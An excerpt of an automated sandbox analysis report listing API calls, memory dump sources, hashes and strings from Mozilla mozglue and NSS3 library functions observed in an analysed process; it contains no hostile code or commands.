                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C791DF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                                        • Opcode ID: db125273baec3bbc31ccaad74b3ac40b1e86ff878eb4b0c4874cccfff87e639e
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ac396b6832fdafd94cf638d96044627c20370af7191f34fd20d6d6943f54934
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db125273baec3bbc31ccaad74b3ac40b1e86ff878eb4b0c4874cccfff87e639e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F14187B5200705AFCB10DF28C589A56BBF9FF89718F10442EE99A87B41CB31F964CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_Now.NSS3 ref: 6C888C7C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C888CB0
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C888CD1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C888CE5
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C888D2E
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C888D62
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C888D93
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 898a82db981bf8636bf26813329085bee83da98d9f0c0ec50e446a44e9e45e07
                                                                                                                                                                                                                                                                                        • Instruction ID: ed5982811372a15e77b0f199ea2818021e1221769994aa7e150c84c903665ff3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 898a82db981bf8636bf26813329085bee83da98d9f0c0ec50e446a44e9e45e07
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA316A71A02205AFD7209F68CD447AA77B4BF25319F24093AEA1567F50D770E924C7D1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7884F3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78850A
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78851E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78855B
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78856F
                                                                                                                                                                                                                                                                                        • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7885AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78767F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C787693
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7876A7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7885B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8910cf6a03208ce858d80301ca7956efbbd6bf71c9b8f1688aa123ac76e02263
                                                                                                                                                                                                                                                                                        • Instruction ID: da69aa2d83b1229d7ce280048e639d25b3c33a511ae918926e453cd548332f38
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8910cf6a03208ce858d80301ca7956efbbd6bf71c9b8f1688aa123ac76e02263
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3421DE742016019FDB14DB28C988A6AB7B5BF8430DF24483DE65BC7B81DB31F949CB51
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C751699
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516CB
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516D7
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516DE
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516E5
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7516EC
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7516F9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f418c1a205ce0dfaa00b3e40c13462ae06caa0106555c72240ce59c621453fe4
                                                                                                                                                                                                                                                                                        • Instruction ID: a7882202371d275632d0a00b859e42eb88a16917e23ff80af8c7d3cbddaec06e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f418c1a205ce0dfaa00b3e40c13462ae06caa0106555c72240ce59c621453fe4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B021D5B07402096FEB105F648D8AFFB737CDF96704F404528F6059B5C0CA749E6487A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78DE73
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C7BFEF3,?,?,?,?,?,?,00000000), ref: 6C78DE7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA
                                                                                                                                                                                                                                                                                        • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C78DEB8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C78DEFE
                                                                                                                                                                                                                                                                                        • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C78DF38
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] locked_profiler_stop, xrefs: 6C78DE83
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentProcessThread$BufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] locked_profiler_stop
                                                                                                                                                                                                                                                                                        • API String ID: 3136165603-3405337583
                                                                                                                                                                                                                                                                                        • Opcode ID: 1425c7cbb310c775966e2501e676f3e02e524c484c16cf16d748856424fe7db2
                                                                                                                                                                                                                                                                                        • Instruction ID: 6ab063e6873bba0e0f72a48f73d57bf5eb47c01ac7321d00b4f772904d0e072b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1425c7cbb310c775966e2501e676f3e02e524c484c16cf16d748856424fe7db2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F213A357021024FEB148B75DA0C79A7779EB9231CF540137EA2987F41CB74AA09CBE5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C878C1B
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C878C34
                                                                                                                                                                                                                                                                                        • PL_ArenaAllocate.NSS3 ref: 6C878C65
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3 ref: 6C878C9C
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3 ref: 6C878CB6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                        • String ID: KRAM
                                                                                                                                                                                                                                                                                        • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                        • Opcode ID: 82637fe1b0bd5bacb3139bb8bfb14bb7f728421e5f649a4f8db6129303b4a9f5
                                                                                                                                                                                                                                                                                        • Instruction ID: fffe4bacbc5ac495e1f2e018a0482c2b005e52533a152b43b572a6724e8516f7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82637fe1b0bd5bacb3139bb8bfb14bb7f728421e5f649a4f8db6129303b4a9f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38217EB16056018FD760AF38C58456DBBF4FF45318F16896AD8889B701EB35D885CBA2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F619
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C78F598), ref: 6C78F621
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F637
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F645
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F663
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C78F62A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                        • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                        • Opcode ID: 9b1399a9a0d87940162fcff95040f2880b493d67017bcc1d9f58c5e4137b203a
                                                                                                                                                                                                                                                                                        • Instruction ID: 082bd13aeb67bc4392449214ceda623a58c43f4e12b25c6965bb7bc4322bdc3e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b1399a9a0d87940162fcff95040f2880b493d67017bcc1d9f58c5e4137b203a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2011C131302206AFCB40AF68CA4C9E5777DFB86769F100036FA1683F41CB35AA11CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C972CA0
                                                                                                                                                                                                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C972CBE
                                                                                                                                                                                                                                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6C972CD1
                                                                                                                                                                                                                                                                                        • strdup.MOZGLUE(?), ref: 6C972CE1
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C972D27
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Loaded library %s (static lib), xrefs: 6C972D22
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                        • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                        • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                        • Opcode ID: 39ae2a1616c4223dbff9fb8a0beb143ba064d8b86780fdf69e7827f3eec79750
                                                                                                                                                                                                                                                                                        • Instruction ID: d90f91172d74dc44e099f8b7c378c941af944c06d49ae966e61eda1007f23c1a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39ae2a1616c4223dbff9fb8a0beb143ba064d8b86780fdf69e7827f3eec79750
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 681127B1716600DFEB208F18D948A6677B8EB5630DF28813DD809C7B41E771E918CBB1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F559
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F561
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78F577
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F585
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F5A3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C78F56A
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_resume, xrefs: 6C78F239
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C78F499
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C78F3A8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
